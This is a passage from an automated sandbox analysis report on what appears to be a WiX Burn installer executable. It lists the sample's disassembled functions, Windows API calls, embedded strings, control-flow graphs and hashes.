                                                                                                                                                              • GetLastError.KERNEL32 ref: 00A1E836
                                                                                                                                                              • CreateWindowExW.USER32(00000080,00A59E54,00000000,90000000,80000000,00000008,00000000,00000000,00000000,00000000,?,?), ref: 00A1E89D
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00A1E8A7
                                                                                                                                                              • UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 00A1E945
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
                                                                                                                                                              • String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
                                                                                                                                                              • API String ID: 213125376-288575659
                                                                                                                                                              • Opcode ID: ffc6086139e952b1615e361226985dd560113455d04782cd4a37d6cd9fe6ddf6
                                                                                                                                                              • Instruction ID: b6c4b0d89829a9d4654810d2ab8eaa361ee7f6f3836dda0de4bf4cb74a53dbd9
                                                                                                                                                              • Opcode Fuzzy Hash: ffc6086139e952b1615e361226985dd560113455d04782cd4a37d6cd9fe6ddf6
                                                                                                                                                              • Instruction Fuzzy Hash: 9A41817A900225EBDB20CFE5DC49ADEBFB8FF09761F104125FD05AA290D771A945CBA0
                                                                                                                                                              Function 00A0C28F Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 131fileCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1278 a0c28f-a0c2c1 1279 a0c2c3-a0c2e1 CreateFileW 1278->1279 1280 a0c32b-a0c347 GetCurrentProcess * 2 DuplicateHandle 1278->1280 1283 a0c383-a0c389 1279->1283 1284 a0c2e7-a0c2f1 GetLastError 1279->1284 1281 a0c381 1280->1281 1282 a0c349-a0c353 GetLastError 1280->1282 1281->1283 1285 a0c360 1282->1285 1286 a0c355-a0c35e 1282->1286 1289 a0c393 1283->1289 1290 a0c38b-a0c391 1283->1290 1287 a0c2f3-a0c2fc 1284->1287 1288 a0c2fe 1284->1288 1292 a0c362 1285->1292 1293 a0c367-a0c37f call a03821 1285->1293 1286->1285 1287->1288 1294 a0c300 1288->1294 1295 a0c305-a0c318 call a03821 1288->1295 1291 a0c395-a0c3a3 SetFilePointerEx 1289->1291 1290->1291 1296 a0c3a5-a0c3af GetLastError 1291->1296 1297 a0c3da-a0c3e0 1291->1297 1292->1293 1306 a0c31d-a0c326 call a40237 1293->1306 1294->1295 1295->1306 1301 a0c3b1-a0c3ba 1296->1301 1302 a0c3bc 1296->1302 1303 a0c3e2-a0c3e6 call a21741 1297->1303 1304 a0c3fe-a0c404 1297->1304 1301->1302 1307 a0c3c3-a0c3d8 call a03821 1302->1307 1308 a0c3be 1302->1308 1312 a0c3eb-a0c3ef 1303->1312 1306->1304 1316 a0c3f6-a0c3fd call a40237 1307->1316 1308->1307 1312->1304 1315 a0c3f1 1312->1315 1315->1316 1316->1304
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,00A0C47F,00A05405,?,?,00A05445), ref: 00A0C2D6
                                                                                                                                                              • GetLastError.KERNEL32(?,00A0C47F,00A05405,?,?,00A05445,00A05445,00000000,?,00000000), ref: 00A0C2E7
                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,00A0C47F,00A05405,?,?,00A05445,00A05445,00000000,?), ref: 00A0C336
                                                                                                                                                              • GetCurrentProcess.KERNEL32(000000FF,00000000,?,00A0C47F,00A05405,?,?,00A05445,00A05445,00000000,?,00000000), ref: 00A0C33C
                                                                                                                                                              • DuplicateHandle.KERNELBASE(00000000,?,00A0C47F,00A05405,?,?,00A05445,00A05445,00000000,?,00000000), ref: 00A0C33F
                                                                                                                                                              • GetLastError.KERNEL32(?,00A0C47F,00A05405,?,?,00A05445,00A05445,00000000,?,00000000), ref: 00A0C349
                                                                                                                                                              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00A0C47F,00A05405,?,?,00A05445,00A05445,00000000,?,00000000), ref: 00A0C39B
                                                                                                                                                              • GetLastError.KERNEL32(?,00A0C47F,00A05405,?,?,00A05445,00A05445,00000000,?,00000000), ref: 00A0C3A5
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
                                                                                                                                                              • String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp$crypt32.dll$feclient.dll
                                                                                                                                                              • API String ID: 2619879409-373955632
                                                                                                                                                              • Opcode ID: cbc028c4041ca40a6e73c24bddbb1bd7411befd9efb09557f24072a2771ff7f5
                                                                                                                                                              • Instruction ID: 7dadc468358cbcb189b76149e7728be0d9f3a6bd0c161358e4c9b6afbfb09524
                                                                                                                                                              • Opcode Fuzzy Hash: cbc028c4041ca40a6e73c24bddbb1bd7411befd9efb09557f24072a2771ff7f5
                                                                                                                                                              • Instruction Fuzzy Hash: B341E93A150205ABCB209F69AD49E1BBBB5EBC5730B218529FD149F2D1E771C802DB61
                                                                                                                                                              Function 00A42AF7 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 79libraryloaderCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1319 a42af7-a42b17 call a03838 1322 a42c21-a42c25 1319->1322 1323 a42b1d-a42b2b call a44a6c 1319->1323 1325 a42c27-a42c2a call a45636 1322->1325 1326 a42c2f-a42c35 1322->1326 1327 a42b30-a42b4f GetProcAddress 1323->1327 1325->1326 1329 a42b56-a42b6f GetProcAddress 1327->1329 1330 a42b51 1327->1330 1331 a42b76-a42b8f GetProcAddress 1329->1331 1332 a42b71 1329->1332 1330->1329 1333 a42b96-a42baf GetProcAddress 1331->1333 1334 a42b91 1331->1334 1332->1331 1335 a42bb6-a42bcf GetProcAddress 1333->1335 1336 a42bb1 1333->1336 1334->1333 1337 a42bd6-a42bef GetProcAddress 1335->1337 1338 a42bd1 1335->1338 1336->1335 1339 a42bf6-a42c10 GetProcAddress 1337->1339 1340 a42bf1 1337->1340 1338->1337 1341 a42c17 1339->1341 1342 a42c12 1339->1342 1340->1339 1341->1322 1342->1341
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00A03838: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00A03877
                                                                                                                                                                • Part of subcall function 00A03838: GetLastError.KERNEL32 ref: 00A03881
                                                                                                                                                                • Part of subcall function 00A44A6C: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00A44A9D
                                                                                                                                                              • GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 00A42B41
                                                                                                                                                              • GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 00A42B61
                                                                                                                                                              • GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 00A42B81
                                                                                                                                                              • GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 00A42BA1
                                                                                                                                                              • GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 00A42BC1
                                                                                                                                                              • GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 00A42BE1
                                                                                                                                                              • GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 00A42C01
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$ErrorLast$DirectorySystem
                                                                                                                                                              • String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
                                                                                                                                                              • API String ID: 2510051996-1735120554
                                                                                                                                                              • Opcode ID: 41d5f166b948b248d4bd66c56259736ef42beb000ea1737d41836d1939c60374
                                                                                                                                                              • Instruction ID: 85240be9cd7164fc058a803e8c49f552ee4c4afcda948bd6daf215d5fa439351
                                                                                                                                                              • Opcode Fuzzy Hash: 41d5f166b948b248d4bd66c56259736ef42beb000ea1737d41836d1939c60374
                                                                                                                                                              • Instruction Fuzzy Hash: 13319EB8961209EEDB12DFA0ED02B697BB5F754749F40053AE404D6170E7F60887AFB4
                                                                                                                                                              Function 00A4304F Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 153libraryloadercomCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1343 a4304f-a43073 GetModuleHandleA 1344 a43075-a4307f GetLastError 1343->1344 1345 a430a8-a430b9 GetProcAddress 1343->1345 1346 a43081-a4308a 1344->1346 1347 a4308c 1344->1347 1348 a430fc 1345->1348 1349 a430bb-a430df GetProcAddress * 3 1345->1349 1346->1347 1351 a43093-a430a3 call a03821 1347->1351 1352 a4308e 1347->1352 1350 a430fe-a4311b CoCreateInstance 1348->1350 1353 a430e1-a430e3 1349->1353 1354 a430f8-a430fa 1349->1354 1355 a431b1-a431b3 1350->1355 1356 a43121-a43123 1350->1356 1366 a431c7-a431cc 1351->1366 1352->1351 1353->1354 1358 a430e5-a430e7 1353->1358 1354->1350 1360 a431b5-a431bc 1355->1360 1361 a431c6 1355->1361 1359 a43128-a43138 1356->1359 1358->1354 1363 a430e9-a430f6 1358->1363 1364 a43142 1359->1364 1365 a4313a-a4313e 1359->1365 1360->1361 1374 a431be-a431c0 ExitProcess 1360->1374 1361->1366 1363->1350 1369 a43144-a43154 1364->1369 1365->1359 1367 a43140 1365->1367 1370 a431d4-a431d9 1366->1370 1371 a431ce-a431d0 1366->1371 1373 a4315c 1367->1373 1375 a43166-a4316a 1369->1375 1376 a43156-a4315a 1369->1376 1377 a431e1-a431e8 1370->1377 1378 a431db-a431dd 1370->1378 1371->1370 1373->1375 1380 a43195-a431a6 1375->1380 1381 a4316c-a4317f call a431eb 1375->1381 1376->1369 1376->1373 1378->1377 1380->1355 1382 a431a8-a431af 1380->1382 1381->1355 1385 a43181-a43193 1381->1385 1382->1355 1385->1355 1385->1380
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00A43609,00000000,?,00000000), ref: 00A43069
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00A2C025,?,00A05405,?,00000000,?), ref: 00A43075
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00A430B5
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A430C1
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 00A430CC
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A430D6
                                                                                                                                                              • CoCreateInstance.OLE32(00A6B6B8,00000000,00000001,00A4B818,?,?,?,?,?,?,?,?,?,?,?,00A2C025), ref: 00A43111
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00A431C0
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
                                                                                                                                                              • String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
                                                                                                                                                              • API String ID: 2124981135-499589564
                                                                                                                                                              • Opcode ID: 55e2b150dd8c751e2a7862d068257e2336a92d04b5d1c7f2d0da5650e258e85a
                                                                                                                                                              • Instruction ID: 38816be1fc1c1a455488546a12de02d931a6e52f8ac432721cc4484f78e9bb3d
                                                                                                                                                              • Opcode Fuzzy Hash: 55e2b150dd8c751e2a7862d068257e2336a92d04b5d1c7f2d0da5650e258e85a
                                                                                                                                                              • Instruction Fuzzy Hash: AC41823EB01215ABDF24DBACC845BAEB7B4AFC5711F114268E901EB250D7B1DE418B90
                                                                                                                                                              Function 00A3FCAE Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 76libraryloaderCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1387 a3fcae-a3fcc9 call a03824 1390 a3fcf1 1387->1390 1391 a3fccb-a3fcef GetProcAddress * 2 1387->1391 1392 a3fcf6-a3fcfd 1390->1392 1391->1392 1393 a3fd07-a3fd1a call a03824 1392->1393 1394 a3fcff-a3fd01 1392->1394 1398 a3fdb8-a3fdbc 1393->1398 1399 a3fd20-a3fd39 GetProcAddress 1393->1399 1394->1393 1395 a3fdae 1394->1395 1395->1398 1400 a3fd3b-a3fd3d 1399->1400 1401 a3fd6c-a3fd85 GetProcAddress 1399->1401 1400->1401 1403 a3fd3f-a3fd49 GetLastError 1400->1403 1401->1395 1402 a3fd87-a3fd89 1401->1402 1402->1395 1404 a3fd8b-a3fd95 GetLastError 1402->1404 1405 a3fd56 1403->1405 1406 a3fd4b-a3fd54 1403->1406 1407 a3fda2 1404->1407 1408 a3fd97-a3fda0 1404->1408 1409 a3fd58 1405->1409 1410 a3fd5d-a3fd5e 1405->1410 1406->1405 1411 a3fda4 1407->1411 1412 a3fda9-a3fdac 1407->1412 1408->1407 1409->1410 1413 a3fd60-a3fd6a call a03821 1410->1413 1411->1412 1412->1413 1413->1398
                                                                                                                                                              APIs
                                                                                                                                                              • GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 00A3FCD6
                                                                                                                                                              • GetProcAddress.KERNEL32(SystemFunction041), ref: 00A3FCE8
                                                                                                                                                              • GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 00A3FD2B
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00A3FD3F
                                                                                                                                                              • GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 00A3FD77
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00A3FD8B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$ErrorLast
                                                                                                                                                              • String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$`+?s$cryputil.cpp
                                                                                                                                                              • API String ID: 4214558900-776468437
                                                                                                                                                              • Opcode ID: 5c3742c8cd0860a5f42e46648af8d4589a041bdb8646b9952d94793be06a2124
                                                                                                                                                              • Instruction ID: 4d9a24baad78c54f35a8e347dc7104269c249669c8d3aa8e1f1831b4565630db
                                                                                                                                                              • Opcode Fuzzy Hash: 5c3742c8cd0860a5f42e46648af8d4589a041bdb8646b9952d94793be06a2124
                                                                                                                                                              • Instruction Fuzzy Hash: 1E219B36D71335AFC721D795AD0D79669B4B740B95F010132FC03EA260EBA08C42CAF4
                                                                                                                                                              Function 00A21741 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 106COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,00000000,00000000,?,?,00A0C3EB,?,00000000,?,00A0C47F), ref: 00A21778
                                                                                                                                                              • GetLastError.KERNEL32(?,00A0C3EB,?,00000000,?,00A0C47F,00A05405,?,?,00A05445,00A05445,00000000,?,00000000), ref: 00A21781
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateErrorEventLast
                                                                                                                                                              • String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp$wininet.dll
                                                                                                                                                              • API String ID: 545576003-938279966
                                                                                                                                                              • Opcode ID: c18b8f3981ca721545ff3aa62e2c1c534adc976d90ca96cf04cda983b1b5945c
                                                                                                                                                              • Instruction ID: 086eaecd1b220a0d35a3e1f9bbba6638e7748d5e7c657f9084435f2bebcfb6c1
                                                                                                                                                              • Opcode Fuzzy Hash: c18b8f3981ca721545ff3aa62e2c1c534adc976d90ca96cf04cda983b1b5945c
                                                                                                                                                              • Instruction Fuzzy Hash: B321E87BE4063A77D7215BAD6D85F6B699CFB60BA0F124631BE00BB180EB60DC0085E1
                                                                                                                                                              Function 00A208C2 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 106fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 00A208F2
                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 00A2090A
                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 00A2090F
                                                                                                                                                              • DuplicateHandle.KERNELBASE(00000000,?,?), ref: 00A20912
                                                                                                                                                              • GetLastError.KERNEL32(?,?), ref: 00A2091C
                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 00A2098B
                                                                                                                                                              • GetLastError.KERNEL32(?,?), ref: 00A20998
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to duplicate handle to cab container., xrefs: 00A2094A
                                                                                                                                                              • Failed to add virtual file pointer for cab container., xrefs: 00A20971
                                                                                                                                                              • cabextract.cpp, xrefs: 00A20940, 00A209BC
                                                                                                                                                              • <the>.cab, xrefs: 00A208EB
                                                                                                                                                              • Failed to open cabinet file: %hs, xrefs: 00A209C9
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
                                                                                                                                                              • String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
                                                                                                                                                              • API String ID: 3030546534-3446344238
                                                                                                                                                              • Opcode ID: 70501ddc6c9280189aa8fe2e97b66ae8274ab0ffcc81605f7339b0d03de95406
                                                                                                                                                              • Instruction ID: af55ec3b678a208983fb2ec471d57be03461b7638df57a1f9e181bcbe857c3b6
                                                                                                                                                              • Opcode Fuzzy Hash: 70501ddc6c9280189aa8fe2e97b66ae8274ab0ffcc81605f7339b0d03de95406
                                                                                                                                                              • Instruction Fuzzy Hash: D731063BA41135BBEB209B989C49F9EBE68FF05761F114221FE05B7242D7719C00CAE0
                                                                                                                                                              Function 00A13F9B Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 220sleepCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00A13AA6: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00A13FB5,feclient.dll,?,00000000,?,?,?,00A04B12), ref: 00A13B42
                                                                                                                                                              • Sleep.KERNEL32(000007D0,00000001,feclient.dll,?,00000000,?,?,?,00A04B12,?,?,00A4B488,?,00000001,00000000,00000000), ref: 00A1404C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseSleep
                                                                                                                                                              • String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$clbcatq.dll$crypt32.dll$feclient.dll$log$msasn1.dll
                                                                                                                                                              • API String ID: 2834455192-2673269691
                                                                                                                                                              • Opcode ID: 4890fe0ff66f0effb60c06ca978a1be7e1d332683f834d16176ba7f7ad647bc8
                                                                                                                                                              • Instruction ID: 3239cb3a4e5f9bf0fdcde0360551c18a3973701d7f8c32506970bd335915e4d0
                                                                                                                                                              • Opcode Fuzzy Hash: 4890fe0ff66f0effb60c06ca978a1be7e1d332683f834d16176ba7f7ad647bc8
                                                                                                                                                              • Instruction Fuzzy Hash: 1D61C171A00615BBDF229F28CD46FAA7BB8EF18380B144265FE01DB180E771EED09790
                                                                                                                                                              Function 00A06DB9 Relevance: 19.7, APIs: 2, Strings: 11, Instructions: 166COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • EnterCriticalSection.KERNEL32(00000001,?,00000000,00A05445,00000006,?,00A082B9,?,?,?,00000000,00000000,00000001), ref: 00A06DC8
                                                                                                                                                                • Part of subcall function 00A056A9: CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,00A06595,00A06595,?,00A0563D,?,?,00000000), ref: 00A056E5
                                                                                                                                                                • Part of subcall function 00A056A9: GetLastError.KERNEL32(?,00A0563D,?,?,00000000,?,?,00A06595,?,00A07F02,?,?,?,?,?), ref: 00A05714
                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00000001,?,00000000,00000001,00000000,00000000,?,00A082B9), ref: 00A06F59
                                                                                                                                                              Strings
                                                                                                                                                              • variable.cpp, xrefs: 00A06E4B
                                                                                                                                                              • Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 00A06F6B
                                                                                                                                                              • Unsetting variable '%ls', xrefs: 00A06F15
                                                                                                                                                              • Setting hidden variable '%ls', xrefs: 00A06E86
                                                                                                                                                              • Failed to find variable value '%ls'., xrefs: 00A06DE3
                                                                                                                                                              • Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 00A06ED0
                                                                                                                                                              • Failed to insert variable '%ls'., xrefs: 00A06E0D
                                                                                                                                                              • Setting string variable '%ls' to value '%ls', xrefs: 00A06EED
                                                                                                                                                              • Failed to set value of variable: %ls, xrefs: 00A06F41
                                                                                                                                                              • Attempt to set built-in variable value: %ls, xrefs: 00A06E56
                                                                                                                                                              • Setting numeric variable '%ls' to value %lld, xrefs: 00A06EFA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalSection$CompareEnterErrorLastLeaveString
